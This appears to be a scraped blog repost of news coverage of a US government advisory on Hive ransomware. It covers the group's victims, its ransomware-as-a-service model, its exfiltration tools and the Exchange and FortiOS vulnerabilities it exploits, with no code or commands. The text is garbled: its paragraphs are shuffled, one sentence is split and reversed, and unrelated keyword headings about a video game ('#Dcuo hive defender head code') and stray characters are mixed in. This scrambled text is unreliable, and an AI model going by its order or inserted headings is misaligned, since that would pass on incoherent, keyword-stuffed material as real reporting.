Hive isn’t the only ransomware group to close in on the healthcare sector, which faces unique security issues due to the sensitive nature of critical care offered to patients and personal data involved. “In addition to its capabilities against the Microsoft Windows operating system, Hive ransomware has known variants for Linux, VMware ESXi, and FreeBSD.” “Hive actors exfiltrate data likely using a combination of Rclone and the cloud storage service Mega.nz,” said researchers. Hive actors have carried out several anti-detection measures after gaining initial access to victim systems, including terminating processes related to backups and antivirus, removing all volume shadow copy services and deleting Windows event logs.
#Dcuo hive defender head code
Hive actors have also exploited various Microsoft Exchange vulnerabilities like a feature bypass flaw (CVE-2021-31207), remote code execution bug (CVE-2021-34473) and privilege escalation issue (CVE-2021-34523). In some instances the actors have exploited a known, critical improper authentication flaw in Fortinet's FortiOS SSL VPNs (CVE-2020-12812), for example. However, government agencies have mostly observed Hive being spread through phishing emails, exploitation of known vulnerabilities and vulnerable, external-facing remote services like Remote Desktop Protocol (RDP), or virtual private networks (VPN). "From June 2021 through at least November 2022, threat actors have used Hive ransomware to target a wide range of businesses and critical infrastructure sectors, including Government Facilities, Communications, Critical Manufacturing, Information Technology, and especially Healthcare and Public Health (HPH)."īecause the ransomware affiliates deploying Hive rely on differing TTPs, the actors use various methods to gain initial access to victim networks.
#Dcuo hive defender head update
“Hive ransomware follows the ransomware-as-a-service (RaaS) model in which developers create, maintain, and update the malware, and affiliates conduct the ransomware attacks,” according to the Thursday advisory. Since its discovery in June 2021, Hive has rapidly expanded its reach and has also quickly evolved, as seen in a new variant observed in February that switched from the Go programming language to Rust.
In the advisory, the FBI, CISA and the Department of Health and Human Services (HHS) said that Hive ransomware actors have victimized over 1,300 companies globally and have received $100 million in ransom payments as of November. government agency cybersecurity advisory. The Hive ransomware has racked up hundreds of critical infrastructure victims, especially healthcare and public health organizations, through phishing emails and the exploitation of known, Fortinet and Microsoft Exchange vulnerabilities, according to a new U.S.
0 kommentar(er)
